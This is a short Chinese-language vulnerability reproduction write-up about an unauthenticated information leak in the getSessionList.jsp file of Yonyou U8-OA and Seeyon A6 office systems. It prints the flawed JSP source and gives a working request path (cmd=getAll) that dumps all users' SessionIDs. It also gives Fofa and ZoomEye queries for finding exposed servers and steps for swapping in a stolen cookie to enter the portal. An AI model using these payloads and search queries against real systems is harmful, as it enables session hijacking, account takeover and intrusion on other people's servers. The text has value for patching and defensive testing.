用友致远U8-OA getSessionList jsp信息泄露复现

漏洞简介

用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞，攻击者可利用漏洞获取到所有用户的SessionID，利用泄露的SessionID即可登录该用户并获取shell。

漏洞成因

getSessionList.jsp存在缺陷

<%@ page contentType="text/html;charset=GBK"%>
<%@ page session= "false" %>
<%@ page import="net.btdz.oa.ext.https.*"%>
<%
    String reqType = request.getParameter("cmd");
    String outXML = "";
    boolean allowHttps = true;
    if("allowHttps".equalsIgnoreCase(reqType)){
        //add code to judge whether it allow https or not
        allowHttps = FetchSessionList.checkHttps();
        if (allowHttps) response.setHeader("AllowHttps","1");
    }
    if("getAll".equalsIgnoreCase(reqType)){
        outXML = FetchSessionList.getXMLAll();
    }
    else if("getSingle".equalsIgnoreCase(reqType)){
        String sessionId = request.getParameter("ssid");
        if(sessionId != null){
            outXML = FetchSessionList.getXMLBySessionId(sessionId);
        }
    }
    else{
        outXML += "\r\n";
        outXML += "\r\n";
//        outXML += "\r\n";
//        outXML += "\r\n";
        outXML += "\r\n";
    }
    out.println(outXML);
%>

该文件没有权限验证，当cmd参数为getAll时，便可获取到所有用户的SessionID。

搜索语句

Fofa

app="Yonyou-Seeyon-OA"

ZoomEye

yyoa/index.jsp

漏洞检测

Payload：/yyoa/ext/https/getSessionList.jsp?cmd=getAll

漏洞利用

获取SESSION之后访问：/yyoa/common/js/menu/menu.jsp，替换Cookie

访问yyoa/portal/portalIndex.jsp进入首页